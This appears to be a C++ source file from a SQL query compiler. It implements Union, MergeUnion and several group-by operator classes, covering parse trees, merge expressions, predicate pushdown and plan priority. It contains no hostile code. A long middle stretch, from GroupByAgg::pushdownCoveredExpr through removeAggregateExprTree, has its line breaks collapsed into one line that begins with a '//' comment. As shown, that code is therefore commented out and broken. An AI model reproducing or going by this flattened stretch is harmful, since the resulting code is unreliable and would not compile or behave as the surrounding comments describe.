    xlist.insert(condExpr_.rebuildExprTree());
    llist.insert("condExpr");
  }

  if (trigExceptExprTree_ != NULL)
  {
    xlist.insert(trigExceptExprTree_);
    llist.insert("trigExceptExprTree");
  }

  if (NOT trigExceptExpr_.isEmpty())
  {
    xlist.insert(trigExceptExpr_.rebuildExprTree());
    llist.insert("trigExceptExpr");
  }

  if (alternateRightChildOrderExprTree_ != NULL)
  {
    xlist.insert(alternateRightChildOrderExprTree_);
    llist.insert("alternateRightChildOrderExprTree");
  }

  if (NOT alternateRightChildOrderExpr_.isEmpty())
  {
    xlist.insert(alternateRightChildOrderExpr_.rebuildExprTree());
    llist.insert("alternateRightChildOrderExpr");
  }

  RelExpr::addLocalExpr(xlist,llist);
}

// Display name reflects the union flavor (ordered/blocked/unary/merge).
const NAString Union::getText() const
{
  NAString text;

  switch (getUnionFlags())
  {
    case UNION_ORDERED :   text += "ordered_union";  break;
    case UNION_BLOCKED :   text += "blocked_union";  break;
    case UNION_COND_UNARY: text += "unary_union";    break;
    default :              text += "merge_union";    break;
  }

  if (getOperatorType() == REL_MERGE_UNION)
    text += " (phys.)";

  return text;
}

ItemExpr *Union::getCondExprTree()
{
  return condExprTree_;
}

// Append condExpr to the (item-list) condition parse tree.
void Union::addCondExprTree(ItemExpr *condExpr)
{
  ExprValueId t = condExprTree_;

  ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(condExpr);
  condExprTree_ = t.getPtr();
}

// Detach and return the condition parse tree (caller takes ownership).
ItemExpr *Union::removeCondExprTree()
{
  ItemExpr *result = condExprTree_;

  condExprTree_ = NULL;
  return result;
}

ItemExpr *Union::getTrigExceptExprTree()
{
  return trigExceptExprTree_;
}

// Append trigExceptExpr to the trigger-exception parse tree.
void Union::addTrigExceptExprTree(ItemExpr *trigExceptExpr)
{
  ExprValueId t = trigExceptExprTree_;

  ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(trigExceptExpr);
  trigExceptExprTree_ = t.getPtr();
}

// Detach and return the trigger-exception parse tree (caller owns it).
ItemExpr *Union::removeTrigExceptExprTree()
{
  ItemExpr *result = trigExceptExprTree_;

  trigExceptExprTree_ = NULL;
  return result;
}

// If this Union node is an IF node of a compound statement, this function
// returns either the left or right list of value ids associated with the node.
// It returns the left one if we are currently visiting the left child.
// Otherwise we return the right one.
AssignmentStHostVars *Union::getCurrentList(BindWA *bindWA)
{
  if (currentChild_ == 0)
  {
    if (!leftList_)
    {
      leftList_ = new (bindWA->wHeap()) AssignmentStHostVars(bindWA);
    }
    return leftList_;
  }
  else
  {
    if (!rightList_)
    {
      rightList_ = new (bindWA->wHeap()) AssignmentStHostVars(bindWA);
    }
    return rightList_;
  }
}

// When we are in a CompoundStatement and we have IF statements in it,
// we must create a RETDesc for this Union node (which is
// actually an IF node). In this function, we create a list of
// ValueIdUnion nodes. We figure out which valueids
// of the left child must be matched with those of the right child
// (for instance, if SET :a appears in both children) and which must
// be matched with previously existing valueids (for instance, if
// SET :a = ... only appears in one branch, then the ValueIdUnion associated
// with that SET statement must reference the value id of :a that existed before
// this IF statement).
RETDesc * Union::createReturnTable(AssignmentStArea *assignArea,
                                   BindWA *bindWA)
{
  AssignmentStHostVars * leftList = leftList_;
  AssignmentStHostVars * rightList = rightList_;
  NABoolean foundAMatch = FALSE;
  AssignmentStHostVars *globalList = assignArea->getAssignmentStHostVars();
  NAString const *nameOfLeftVar;
  RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA);
  ColRefName *refName = new (bindWA->wHeap()) ColRefName();
  AssignmentStHostVars *listOfPreviousIF = NULL;

  // We find the list of variables of the previous IF node. We will
  // need to update it since some of its variables may get new value ids
  // within the IF statement
  if (previousIF_)
  {
    short currentChild = previousIF_->currentChild();
    if (currentChild == 0)
    {
      listOfPreviousIF = previousIF_->leftList();
    }
    else
    {
      listOfPreviousIF = previousIF_->rightList();
    }
  }

  // Scan the left list and look for matches in the right List
  while (leftList && (leftList->var()))
  {
    foundAMatch = FALSE;
    nameOfLeftVar = &(leftList->var()->getName());

    rightList = rightList_;
    while (rightList && rightList->var())
    {
      NAString const *nameOfRightVar = &(rightList->var()->getName());
      if (*nameOfLeftVar == *nameOfRightVar)
      {
        foundAMatch = TRUE;
        break;
      }
      rightList = rightList->next();
    }

    AssignmentStHostVars *ptrLeftVar = globalList->findVar(*nameOfLeftVar);
    CMPASSERT(ptrLeftVar);

    // If we found a match, we create a ValueIdUnion node of the paired match; otherwise
    // we pair the current value id of the variable in question with the value id it
    // had before the IF statement. If the variable does not have a value id, we bind it.
    ValueId value ;
    if (foundAMatch)
    {
      value = rightList->currentValueId();
    }
    else
    {
      ValueIdList list = ptrLeftVar->valueIds();
      if (list.entries() > 0)
      {
        value = ptrLeftVar->currentValueId();
      }
      else
      {
        // Get a value id for this variable.
        ItemExpr *expr = ptrLeftVar->var()->bindNode(bindWA);
        if (bindWA->errStatus())
        {
          return NULL;
        }
        value = expr->getValueId();
      }
    }

    ValueIdUnion *vidUnion = new (bindWA->wHeap())
      ValueIdUnion(leftList->currentValueId(),
                   value,
                   NULL_VALUE_ID);
    vidUnion->bindNode(bindWA);
    if (bindWA->errStatus())
    {
      delete vidUnion;
      return NULL;
    }

    ValueId valId = vidUnion->getValueId();
    addValueIdUnion(valId,bindWA->wHeap());
    resultTable->addColumn(bindWA, *refName, valId);

    // The variable inside the IF gets the value id of the ValueIdUnion just
    // generated.
    ptrLeftVar->setCurrentValueId(valId);

    // Also update the variable list in the previous IF node
    if (listOfPreviousIF)
    {
      listOfPreviousIF->addToListInIF(leftList->var(), valId);
    }

    leftList = leftList->next();
  } // while

  // We now search the right list and do a similar processing for the variables on
  // the right side that are not on the left
  rightList = rightList_;
  while (rightList && (rightList->var()))
  {
    foundAMatch = FALSE;
    NAString const *nameOfRightVar = &(rightList->var()->getName());
    AssignmentStHostVars *ptrRightVar = globalList->findVar(*nameOfRightVar);
    CMPASSERT(ptrRightVar);

    leftList = leftList_;
    while (leftList && (leftList->var()))
    {
      nameOfLeftVar = &(leftList->var()->getName());
      if (*nameOfLeftVar == *nameOfRightVar)
      {
        foundAMatch = TRUE;
        break;
      }
      leftList = leftList->next();
    }

    // Create the ValueIdUnion of the two value ids
    if (!foundAMatch)
    {
      ValueId value;
      ValueIdList list = ptrRightVar->valueIds();
      if (list.entries() > 0)
      {
        value = ptrRightVar->currentValueId();
      }
      else
      {
        // Get a value id for this variable.
        ItemExpr *expr = ptrRightVar->var()->bindNode(bindWA);
        value = expr->getValueId();
      }

      ValueIdUnion *vidUnion = new (bindWA->wHeap())
        ValueIdUnion(value,
                     rightList->currentValueId(),
                     NULL_VALUE_ID);
      vidUnion->bindNode(bindWA);
      if (bindWA->errStatus())
      {
        delete vidUnion;
        return NULL;
      }

      ValueId valId = vidUnion->getValueId();
      addValueIdUnion(valId, bindWA->wHeap());
      resultTable->addColumn(bindWA, *refName, valId);

      // The variable inside the IF gets the value id of the ValueIdUnion just
      // generated.
      ptrRightVar->setCurrentValueId(valId);

      // Also update the variable list in the previous IF node
      if (listOfPreviousIF)
      {
        listOfPreviousIF->addToListInIF(rightList->var(), valId);
      }
    } // if (!foundAMatch)

    rightList = rightList->next();
  } // while

  return resultTable;
}

//++ MV -
// Append an expression to the alternate right-child order parse tree.
void Union::addAlternateRightChildOrderExprTree(ItemExpr *alternateRightChildOrderExprTree)
{
  ExprValueId t = alternateRightChildOrderExprTree_;

  ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(alternateRightChildOrderExprTree);
  alternateRightChildOrderExprTree_ = t.getPtr();
}

// Detach and return the alternate right-child order parse tree.
ItemExpr *Union::removeAlternateRightChildOrderExprTree()
{
  ItemExpr *result = alternateRightChildOrderExprTree_;

  alternateRightChildOrderExprTree_ = NULL;
  return result;
}
// MV--

// -----------------------------------------------------------------------
// member functions for class MergeUnion
// -----------------------------------------------------------------------

MergeUnion::~MergeUnion() {}

// MergeUnion is the physical (not logical) form of Union.
NABoolean MergeUnion::isLogical() const { return FALSE; }
NABoolean MergeUnion::isPhysical() const { return TRUE; }

HashValue MergeUnion::topHash()
{
  HashValue result = Union::topHash();

  // result ^= mergeExpr_;

  return result;
}

// Physical nodes are never compared for duplicates; always aborts.
NABoolean MergeUnion::duplicateMatch(const RelExpr & other) const
{
  if (!RelExpr::duplicateMatch(other))
    return FALSE;

  MergeUnion &o = (MergeUnion &) other;

  // if (mergeExpr_ != o.mergeExpr_)
  ABORT("duplicateMatch shouldn't be called for physical nodes");
  return FALSE;
}

RelExpr * MergeUnion::copyTopNode(RelExpr
*derivedNode, CollHeap* outHeap)
{
  MergeUnion *result;

  if (derivedNode == NULL)
    // note: the physical copy gets its own UnionMap copy
    result = new (outHeap) MergeUnion(NULL,
                                      NULL,
                                      new (outHeap)UnionMap(*getUnionMap()),
                                      getOperatorType(),
                                      outHeap);
  else
    result = (MergeUnion *) derivedNode;

  result->mergeExpr_ = mergeExpr_;

  return Union::copyTopNode(result, outHeap);
}

// Install a new sort order and rebuild the merge expression from it.
void MergeUnion::setSortOrder(const ValueIdList &newSortOrder)
{
  sortOrder_ = newSortOrder;
  buildMergeExpr();
}

// Expose the sort order and merge expression for tree display/debugging.
void MergeUnion::addLocalExpr(LIST(ExprNode *) &xlist,
                              LIST(NAString) &llist) const
{
  if (sortOrder_.entries() > 0)
  {
    xlist.insert(sortOrder_.rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("sort_order");
  }

  if (mergeExpr_ != NULL)
  {
    xlist.insert(mergeExpr_);
    llist.insert("merge_expr");
  }

  Union::addLocalExpr(xlist,llist);
}

void MergeUnion::buildMergeExpr()
{
  // ---------------------------------------------------------------------
  // build the merge expression (an expression that tells which of the
  // two input rows, left or right, should be returned next) by creating
  // an expression "left <= right" from the sort order.
  // ---------------------------------------------------------------------
  ItemExpr *leftList = NULL;
  ItemExpr *rightList = NULL;
  BiRelat *result = NULL;

  if (sortOrder_.entries() > 0)
  {
    for (Lng32 i = 0; i < (Lng32)sortOrder_.entries(); i++)
    {
      ItemExpr *leftItem;
      ItemExpr *rightItem;

      // map each sort key column to its left and right child source
      leftItem = sortOrder_[i].getItemExpr()->
        mapAndRewrite(getLeftMap(),TRUE).getItemExpr();
      rightItem = sortOrder_[i].getItemExpr()->
        mapAndRewrite(getRightMap(),TRUE).getItemExpr();

      // swap left and right if DESC is specified.
      if(leftItem->getOperatorType() == ITM_INVERSE)
      {
        // both streams must be sorted according to the same order.
        CMPASSERT(rightItem->getOperatorType() == ITM_INVERSE);
        ItemExpr *temp = leftItem;
        leftItem = rightItem;
        rightItem = temp;
      }

      // add the newly formed fields of the sort key to the
      // left and right lists of sort keys
      if (leftList != NULL)
      {
        leftList = new (CmpCommon::statementHeap())
          ItemList(leftList,leftItem);
        rightList = new (CmpCommon::statementHeap())
          ItemList(rightList,rightItem);
      }
      else
      {
        // both left and right list must be NULL
        leftList = leftItem;
        rightList = rightItem;
      }
    }

    result = new (CmpCommon::statementHeap())
      BiRelat(ITM_LESS_EQ,leftList,rightList);

    // make the comparison such that NULLs compare greater than instead
    // of making the expression result NULL
    result->setSpecialNulls(TRUE);
    result->synthTypeAndValueId();
  }

  // store the result in the merge expression
  mergeExpr_ = result;
}

// -----------------------------------------------------------------------
// member functions for class GroupByAgg
// -----------------------------------------------------------------------

GroupByAgg::~GroupByAgg() {}

// GroupByAgg is a unary operator.
Int32 GroupByAgg::getArity() const { return 1; }

void GroupByAgg::pushdownCoveredExpr(const ValueIdSet & outputExpr,
                                     const ValueIdSet & newExternalInputs,
                                     ValueIdSet & predicatesOnParent,
                                     const ValueIdSet * setOfValuesReqdByParent,
                                     Lng32 childIndex
                                     )
{
  // ---------------------------------------------------------------------
  // predicates can only be pushed down if the group by did contain
  // a group by clause or if this is a scalar groupby for a subquery that
  // contains null rejecting predicates. If the subquery contains null-rej.
  // preds then it does not need to do null instantiation for the empty
  // result set and therefore we do not create a separate VEGRegion for this
  // subquery. This means that preds can be freely pushed down in this case.
  // See GroupByAgg::pullUpPreds for a symmetric condition.
// --------------------------------------------------------------------- ValueIdSet pushablePredicates; ValueIdSet exprOnParent; ValueIdSet emptySet; if (NOT groupExpr().isEmpty() || containsNullRejectingPredicates()) pushablePredicates = predicatesOnParent; #if 0 else computeValuesReqdForPredicates(predicatesOnParent, exprOnParent); #endif // --------------------------------------------------------------------- // Cause the retrieval of all those values that are needed for // computing the aggregate functions and the group by list. // --------------------------------------------------------------------- getValuesRequiredForEvaluatingAggregate(exprOnParent); exprOnParent += groupExpr(); // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(emptySet, newExternalInputs, pushablePredicates, &exprOnParent, childIndex ); // --------------------------------------------------------------------- // Set the value of predicatesOnParent appropriately. // --------------------------------------------------------------------- if (NOT groupExpr().isEmpty() || containsNullRejectingPredicates()) predicatesOnParent.intersectSet(pushablePredicates); } // GroupByAgg::pushdownCoveredExpr void GroupByAgg::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // Assign the grouping expressions and the aggregate functions // that are computed here as the outputs. // outputValues += groupExpr(); outputValues += aggregateExpr(); // If we're enforcing an ITM_ONE_ROW on (x,y), then we can produce not // merely the ITM_ONE_ROW, but also x and y, so add them to our outputs. // For example, if the aggregate is, say, // ITM_ONE_ROW(VEGRef_10(T.A,ixT.A), VEGRef_15(T.B,ixT.B)) // { example query: select * from S where (select A,B from T) < (100,200) } // then add value ids 10 and 11 to our characteristic outputs. 
// for (ValueId aggid = aggregateExpr().init(); aggregateExpr().next(aggid); aggregateExpr().advance(aggid)) { ItemExpr *aggie = aggid.getItemExpr(); if (aggie->getOperatorType() == ITM_ONE_ROW) { ValueIdSet moreAvailableOutputs; aggie->child(0)->convertToValueIdSet(moreAvailableOutputs, NULL, ITM_ITEM_LIST, FALSE); outputValues += moreAvailableOutputs; } } } // GroupByAgg::getPotentialOutputValues() const NAString GroupByAgg::getText() const { if (NOT groupExpr().isEmpty()) { if (isNotAPartialGroupBy()) return "groupby"; else if (isAPartialGroupByRoot()) return "partial_groupby_root"; else if (isAPartialGroupByNonLeaf()) return "partial_groupby_non_leaf"; else return "partial_groupby_leaf"; } else { if (isNotAPartialGroupBy()) return "scalar_aggr"; else if (isAPartialGroupByRoot()) return "partial_aggr_root"; else if (isAPartialGroupByNonLeaf()) return "partial_aggr_non_leaf"; else return "partial_aggr_leaf"; } } // GroupByAgg::getText() HashValue GroupByAgg::topHash() { HashValue result = RelExpr::topHash(); result ^= groupExpr_; result ^= aggregateExpr_; result ^= (Int32) formEnum_; // MSVC requires cast. 
return result; } NABoolean GroupByAgg::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; GroupByAgg &o = (GroupByAgg &) other; if (groupExpr_ != o.groupExpr_ OR aggregateExpr_ != o.aggregateExpr_ OR formEnum_ != o.formEnum_ ) return FALSE; return TRUE; } RelExpr * GroupByAgg::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { GroupByAgg *result; if (derivedNode == NULL) result = new (outHeap) GroupByAgg(NULL, getOperatorType(), NULL, NULL, outHeap); else result = (GroupByAgg *) derivedNode; // copy parse tree nodes (parser only) if (groupExprTree_ != NULL) result->groupExprTree_ = groupExprTree_->copyTree(outHeap); if (aggregateExprTree_ != NULL) result->aggregateExprTree_ = aggregateExprTree_->copyTree(outHeap); result->groupExpr_ = groupExpr_; result->rollupGroupExprList_ = rollupGroupExprList_; result->aggregateExpr_ = aggregateExpr_; result->formEnum_ = formEnum_; result->gbAggPushedBelowTSJ_ = gbAggPushedBelowTSJ_; result->gbAnalysis_ = gbAnalysis_; result->requiresMoveUp_ = requiresMoveUp_ ; result->leftUniqueExpr_ = leftUniqueExpr_; result->containsNullRejectingPredicates_ = containsNullRejectingPredicates_ ; result->parentRootSelectList_ = parentRootSelectList_; result->isMarkedForElimination_ = isMarkedForElimination_; result->selIndexInHaving_ = selIndexInHaving_; result->aggrExprsToBeDeleted_ = aggrExprsToBeDeleted_; result->isRollup_ = isRollup_; result->extraGrpOrderby_= extraGrpOrderby_; result->extraOrderExpr_= extraOrderExpr_; return RelExpr::copyTopNode(result, outHeap); } void GroupByAgg::addGroupExprTree(ItemExpr *groupExpr) { ExprValueId g = groupExprTree_; ItemExprTreeAsList(&g, ITM_ITEM_LIST).insert(groupExpr); groupExprTree_ = g.getPtr(); } ItemExpr * GroupByAgg::removeGroupExprTree() { ItemExpr * result = groupExprTree_; groupExprTree_ = NULL; return result; } void GroupByAgg::addAggregateExprTree(ItemExpr *aggrExpr) { ExprValueId g = groupExprTree_; ItemExprTreeAsList(&g, 
ITM_ITEM_LIST).insert(aggrExpr); groupExprTree_ = g.getPtr(); } ItemExpr * GroupByAgg::removeAggregateExprTree() { ItemExpr * result = aggregateExprTree_; aggregateExprTree_ = NULL; return result; } void GroupByAgg::getValuesRequiredForEvaluatingAggregate(ValueIdSet& relevantValues) { // Find the values that are needed to evaluate aggregate functions. // NOTE: this should normally just be the direct children of the // aggregate functions. However, some aggregate functions such as // anyTrue sometimes refer to values further down the tree (and // if it's only by using such values as required sort orders). // Handle this special case here (or maybe we should have changed // the anyTrue aggregate function such that it takes separate arguments: // anyTrueGreater(a,b), anyTrueLess(a,b), anyTrueGreaterEq(a,b), ... // for each aggregate expression in the groupby node for (ValueId x = aggregateExpr_.init(); aggregateExpr_.next(x); aggregateExpr_.advance(x)) { Aggregate *agg = (Aggregate *) x.getItemExpr(); Lng32 nc = agg->getArity(); // handle special cases for special aggregate functions switch (agg->getOperatorType()) { case ITM_ANY_TRUE: case ITM_ANY_TRUE_MAX: { ItemExpr *boolInput = agg->child(0); // if the child is a binary comparison operator, then // require both of the children instead of the comparison op. 
switch (boolInput->getOperatorType())
        {
          case ITM_EQUAL:
          case ITM_NOT_EQUAL:
          case ITM_LESS:
          case ITM_LESS_EQ:
          case ITM_GREATER:
          case ITM_GREATER_EQ:
            relevantValues += boolInput->child(0)->getValueId();
            relevantValues += boolInput->child(1)->getValueId();
            break;

          case ITM_VEG_PREDICATE:
          {
            // a VEG predicate contributes its VEG reference
            VEG * vegPtr = ((VEGPredicate *)boolInput)->getVEG();
            relevantValues += vegPtr->getVEGReference()->getValueId();
          }
          break;

          default:
            // might not happen right now: an anyTrue with something
            // other than a binary comparison operator
            relevantValues += boolInput->getValueId();
            break;
        }
      }
      break;

      case ITM_ONE_ROW:
      {
        // collect leaf values into relevant Values
        ValueIdSet AvailableOutputs_;
        agg->child(0)->convertToValueIdSet(AvailableOutputs_,
                                           NULL, ITM_ITEM_LIST, FALSE);
        relevantValues += AvailableOutputs_;
        break;
      }

      default:
      {
        // all other aggregate functions are handled here
        //
        // If we are doing a distinct aggregate we need the
        // distinct value id. E.g. sum(distinct x*x) with distinct
        // valueId x, means we eliminate
        // distinct x's first, then compute sum(x*x)
        if(agg->isDistinct())
          relevantValues += agg->getDistinctValueId();
        else
          relevantValues += agg->child(0)->getValueId();

        // for each child of this particular aggregate expression
        for (Lng32 i = 1; i < nc; i++)
        {
          // add the value id of that child to "relevantValues"
          relevantValues += agg->child(i)->getValueId();
        }
      }
      break;
    }
  }
}

// Expose grouping columns and aggregates for tree display/debugging.
void GroupByAgg::addLocalExpr(LIST(ExprNode *) &xlist,
                              LIST(NAString) &llist) const
{
  if (groupExprTree_ != NULL OR
      NOT groupExpr_.isEmpty())
  {
    if (groupExpr_.isEmpty())
      xlist.insert(groupExprTree_);
    else if (isRollup() &&
             (NOT rollupGroupExprList_.isEmpty()))
      xlist.insert(rollupGroupExprList_.rebuildExprTree(ITM_ITEM_LIST));
    else
      xlist.insert(groupExpr_.rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("grouping_columns");
  }

  if (aggregateExprTree_ != NULL OR
      NOT aggregateExpr_.isEmpty())
  {
    if (aggregateExpr_.isEmpty())
      xlist.insert(aggregateExprTree_);
    else
      xlist.insert(aggregateExpr_.rebuildExprTree(ITM_ITEM_LIST));
    llist.insert("aggregates");
  }

  RelExpr::addLocalExpr(xlist,llist);
}

// -----------------------------------------------------------------------
// Examine the aggregate functions. If any one of them cannot be
// evaluated in stages, for example, a partial aggregation followed
// by finalization, then do not split this GroupByAgg.
// -----------------------------------------------------------------------
NABoolean GroupByAgg::aggregateEvaluationCanBeStaged() const
{
  for (ValueId aggrId = aggregateExpr().init();
       aggregateExpr().next(aggrId);
       aggregateExpr().advance(aggrId))
  {
    CMPASSERT(aggrId.getItemExpr()->isAnAggregate());
    // a scalar ONEROW aggregate cannot be staged
    if (groupExpr().isEmpty() &&
        (aggrId.getItemExpr()->getOperatorType() == ITM_ONEROW))
      return FALSE;
    if (NOT ((Aggregate *)aggrId.getItemExpr())->evaluationCanBeStaged())
      return FALSE;
  }
  return TRUE;
} // GroupByAgg::aggregateEvaluationCanBeStaged()

// True iff this node's plan executes inside DP2 (requires a synthesized
// physical property).
NABoolean GroupByAgg::executeInDP2() const
{
  CMPASSERT(getPhysicalProperty());
  return getPhysicalProperty()->executeInDP2();
}

// Try to pull up predicates in preCodeGen, to reduce char. inputs of the
// child. Don't actually do this unless "modify" parameter is set to TRUE,
// (we want to test this condition in the optimizer for costing).
// Return TRUE if we could move some predicates.
// Could make this a virtual method on RelExpr if we want to support
// this for other operators as well.
NABoolean GroupByAgg::tryToPullUpPredicatesInPreCodeGen(
     const ValueIdSet &valuesAvailableInParent, // pull preds that are covered by these
     ValueIdSet &pulledPredicates,              // return the pulled-up preds
     ValueIdMap *optionalMap)                   // optional map to rewrite preds
{
  // other item expressions needed by the child (excluding
  // selection preds), this is where we make use of the knowledge
  // that we are dealing with a groupby.
  ValueIdSet myLocalExpr;
  ValueIdSet myNewInputs(getGroupAttr()->getCharacteristicInputs());
  ValueIdSet mappedValuesAvailableInParent;
  ValueIdSet tempPulledPreds(selectionPred()); // be optimistic

  myLocalExpr += child(0).getGroupAttr()->getCharacteristicInputs();
  myLocalExpr += groupExpr();
  myLocalExpr += aggregateExpr();

  // consider only preds that we can evaluate in the parent
  if (optionalMap)
    optionalMap->mapValueIdSetDown(valuesAvailableInParent,
                                   mappedValuesAvailableInParent);
  else
    mappedValuesAvailableInParent = valuesAvailableInParent;
  tempPulledPreds.removeUnCoveredExprs(mappedValuesAvailableInParent);

  // add the rest to myLocalExpr
  myLocalExpr += selectionPred();
  myLocalExpr -= tempPulledPreds;

  // see which of the char. inputs are needed by my local expressions
  myLocalExpr.weedOutUnreferenced(myNewInputs);

  // pull up predicates only if that reduces my char. inputs
  if (NOT (myNewInputs == getGroupAttr()->getCharacteristicInputs()))
  {
    ValueIdSet selPredOnlyInputs(getGroupAttr()->getCharacteristicInputs());

    // inputs only used by selection predicates
    selPredOnlyInputs -= myNewInputs;

    // loop through the selection predicates and pull
    // those up that reference myNewInputs
    for (ValueId x=tempPulledPreds.init();
         tempPulledPreds.next(x);
         tempPulledPreds.advance(x))
    {
      if (x.getItemExpr()->referencesOneValueFrom(selPredOnlyInputs))
      {
        // keep this predicate in tempPulledPreds and
        // remove it from the selection predicates
        selectionPred() -= x;
      }
      else
      {
        // this predicate stays on the local node,
        // remove it from tempPulledPreds
        tempPulledPreds -= x;
      }
    }
  }
  else
  {
    // no predicates get pulled up
    tempPulledPreds.clear();
  }

  if (!tempPulledPreds.isEmpty())
  {
    // return pulled predicates
    if (optionalMap)
    {
      ValueIdSet rewrittenPulledPreds;

      optionalMap->rewriteValueIdSetUp(rewrittenPulledPreds, tempPulledPreds);
      pulledPredicates += rewrittenPulledPreds;
    }
    else
      pulledPredicates += tempPulledPreds;

    // adjust char. inputs - this is not exactly
    // good style, just overwriting the char. inputs, but
    // hopefully we'll get away with it at this stage in
    // the processing
    getGroupAttr()->setCharacteristicInputs(myNewInputs);
  }

  // note that we removed these predicates from our node, it's the
  // caller's responsibility to take them
  return (NOT tempPulledPreds.isEmpty());
}

// -----------------------------------------------------------------------
// member functions for class SortGroupBy
// -----------------------------------------------------------------------

SortGroupBy::~SortGroupBy() {}

// SortGroupBy is a physical operator.
NABoolean SortGroupBy::isLogical() const {return FALSE;}
NABoolean SortGroupBy::isPhysical() const {return TRUE;}

const NAString SortGroupBy::getText() const
{
  if (isRollup())
    return "sort_" + GroupByAgg::getText() + "_rollup";
  else
    return "sort_" + GroupByAgg::getText();
}

RelExpr * SortGroupBy::copyTopNode(RelExpr *derivedNode,
                                   CollHeap* outHeap)
{
  RelExpr *result;

  if (derivedNode == NULL)
    result = new (outHeap) SortGroupBy(NULL,
                                       getOperatorType(),
                                       NULL,
                                       NULL,
                                       outHeap);
  else
    result = derivedNode;

  return GroupByAgg::copyTopNode(result, outHeap);
}

PlanPriority ShortCutGroupBy::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  // For min(X) or max(X) where X is the first clustering key column,
  // allow shortcutgroupby plan to compete with other plans based on cost.
  // Specifically, match the priority of the wave fix so that a
  // shortcutgroupby plan can cost compete with the parallel
  // partialgroupby plan.
PlanPriority result;
  if (QueryAnalysis::Instance() &&
      QueryAnalysis::Instance()->dontSurfTheWave())
  {
    // do this only if the wave fix is a competing plan
    result.incrementLevels(10, 0);
  }
  return result;
}

// Plan priority for a sort group-by: penalizes risky serial plans via a
// cost premium and adjusts priority for parallelism considerations.
PlanPriority SortGroupBy::computeOperatorPriority
(const Context* context,
 PlanWorkSpace *pws,
 Lng32 planNumber)
{
  const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty();
  Lng32 degreeOfParallelism = spp->getCountOfPartitions();
  double val = 1;
  if (degreeOfParallelism <= 1)
  {
    // serial plans are risky. exact an insurance premium from serial plans.
    val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial();

    // when dontSurfTheWave is ON,
    // consider serial sort_partial_aggr_nonleaf risky
    if (QueryAnalysis::Instance() &&
        QueryAnalysis::Instance()->dontSurfTheWave() &&
        isAPartialGroupByNonLeaf() && val <= 1)
    {
      val = 1.1;
    }
  }
  CostScalar premium(val);
  PlanPriority result(0, 0, premium);

  // WaveFix Begin
  // This is part of the fix for the count(*) wave
  // if there is a scalar aggregate query on a single partitioned table,
  // something like Select count(*) from fact;
  // In such a case we would like to get a layer of esps,
  // doing so causes the plan to fixup in parallel avoiding the serial
  // fixup if the plan is just the master executor on top of dp2. The
  // serial fixup causes the query to execute in wave pattern, since
  // each dp2 is fixed up and then starts execution. Due to serial
  // fixup a dp2 is fixed up, and then we move to the next dp2 causing
  // the wave pattern.
  if (QueryAnalysis::Instance() &&
      QueryAnalysis::Instance()->dontSurfTheWave())
  {
    if (isAPartialGroupByLeaf2() && spp->executeInDP2())
      result.incrementLevels(10, 0);
    else if (isAPartialGroupByLeaf1() &&
             (degreeOfParallelism>1) &&
             (!spp->executeInDP2()))
      result.incrementLevels(5, 0);
  }
  // WaveFix End

  // The remaining part of the code in this function relates to parallelism
  // priority and not applicable to scalar aggregates
  if (groupExpr().isEmpty())
    return result;

  if(spp->executeInDP2())
    return result;

  // For the option of Max Degree of Parallelism we can either use the
  // value set in comp_int_9 (if positive) or we use the number of CPUs
  // if the CQD is set to -1, or feature is disabled if CQD is 0 (default).
  Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9);
  if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR (maxDegree == -1) )
  {
    // if CQD is set to -1 this mean use the number of CPUs
    maxDegree = spp->getCurrentCountOfCPUs();
  }
  if (maxDegree > 1)  // CQD set to 0 means feature is OFF
  {
    if (degreeOfParallelism < maxDegree)
      result.incrementLevels(0,-10); // need to replace with constant
  }

  return result;
}

// -----------------------------------------------------------------------
// member functions for class ShortCutGroupBy
// -----------------------------------------------------------------------
const NAString ShortCutGroupBy::getText() const
{
  return "shortcut_" + GroupByAgg::getText();
}

RelExpr * ShortCutGroupBy::copyTopNode(RelExpr *derivedNode,
                                       CollHeap* outHeap)
{
  ShortCutGroupBy *result;

  if (derivedNode == NULL)
    // This is the top of the derivation chain
    // Create an empty ShortCutGroupBy node.
    //
    result = new (outHeap) ShortCutGroupBy(NULL,
                                           getOperatorType(),
                                           NULL,
                                           NULL,
                                           outHeap);
  else
    // A node has already been constructed as a derived class.
    //
    result = (ShortCutGroupBy *) derivedNode;

  // Copy the relevant fields.
result->opt_for_max_ = opt_for_max_;   // anytrue/min-max shortcut flags
result->opt_for_min_ = opt_for_min_;
result->isnullable_ = isnullable_;
result->lhs_anytrue_ = lhs_anytrue_;
result->rhs_anytrue_ = rhs_anytrue_;

// Copy any data members from the classes lower in the derivation chain.
//
return GroupByAgg::copyTopNode(result, outHeap);
}

// -----------------------------------------------------------------------
// member functions for class PhysShortCutGroupBy
// -----------------------------------------------------------------------

// Copies this physical node; PhysShortCutGroupBy itself adds no data
// members, so all copying is delegated to ShortCutGroupBy::copyTopNode.
RelExpr * PhysShortCutGroupBy::copyTopNode(RelExpr *derivedNode,
                                           CollHeap* outHeap)
{
  RelExpr *result;

  if (derivedNode == NULL)
    // This is the top of the derivation chain
    // Create an empty ShortCutGroupBy node.
    //
    result = new (outHeap) PhysShortCutGroupBy(NULL, getOperatorType(),
                                               NULL, NULL, outHeap);
  else
    // A node has already been constructed as a derived class.
    //
    result = (PhysShortCutGroupBy *) derivedNode;

  // PhysShortCutGroupBy has no data members.

  // Copy any data members from the classes lower in the derivation chain.
  //
  return ShortCutGroupBy::copyTopNode(result, outHeap);
}

// -----------------------------------------------------------------------
// member functions for class HashGroupBy
// -----------------------------------------------------------------------

HashGroupBy::~HashGroupBy() {}

// HashGroupBy is a physical (not logical) operator.
NABoolean HashGroupBy::isLogical() const {return FALSE;}

NABoolean HashGroupBy::isPhysical() const {return TRUE;}

// Operator name used in EXPLAIN/debug output: "hash_" + base text.
